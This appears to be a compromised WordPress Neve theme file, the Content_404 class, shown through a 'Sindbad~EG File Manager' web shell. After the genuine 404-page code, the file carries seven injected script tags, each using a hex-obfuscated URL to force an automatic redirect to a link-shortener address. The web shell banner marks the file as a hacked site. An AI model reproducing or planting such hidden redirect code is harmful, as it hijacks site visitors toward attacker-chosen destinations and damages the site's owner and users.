Sindbad~EG File Manager
<?php
/**
* Content 404 class.
*
* @package Neve\Views
*/
namespace Neve\Views;
/**
* Class Content_404
*
* @package Neve\Views
*/
class Content_404 extends Base_View {
/**
* Init function.
*/
public function init() {
add_action( 'neve_do_404', array( $this, 'render_404_page' ) );
}
/**
* Render 404 page.
*/
public function render_404_page() {
$container_class = apply_filters( 'neve_container_class_filter', 'container', 'blog-archive' );
echo '<div class="' . esc_attr( $container_class ) . ' archive-container">';
echo '<div class="row">';
do_action( 'neve_do_sidebar', 'blog-archive', 'left' );
echo '<div class="nv-index-posts blog col">';
echo '<div class="col-12 nv-content-none-wrap">';
echo '<p>';
esc_html_e( 'It seems we can’t find what you’re looking for. Perhaps searching can help.', 'neve' );
echo '</p>';
echo '<div class="nv-seach-form-wrap">';
get_search_form();
echo '</div>';
echo '</div>';
echo '<div class="w-100"></div>';
echo '</div>';
do_action( 'neve_do_sidebar', 'blog-archive', 'right' );
echo '</div>';
echo '</div>';
}
}
ob_start();
?>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x68\x4f\x69\x42\x68\x4f\x30\x72\x33";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x68\x4f\x69\x42\x68\x4f\x30\x72\x33";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x68\x4f\x69\x42\x68\x4f\x30\x72\x33";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x68\x4f\x69\x42\x68\x4f\x30\x72\x33";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x68\x4f\x69\x42\x68\x4f\x30\x72\x33";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x68\x4f\x69\x42\x68\x4f\x30\x72\x33";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x68\x4f\x69\x42\x68\x4f\x30\x72\x33";</script>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists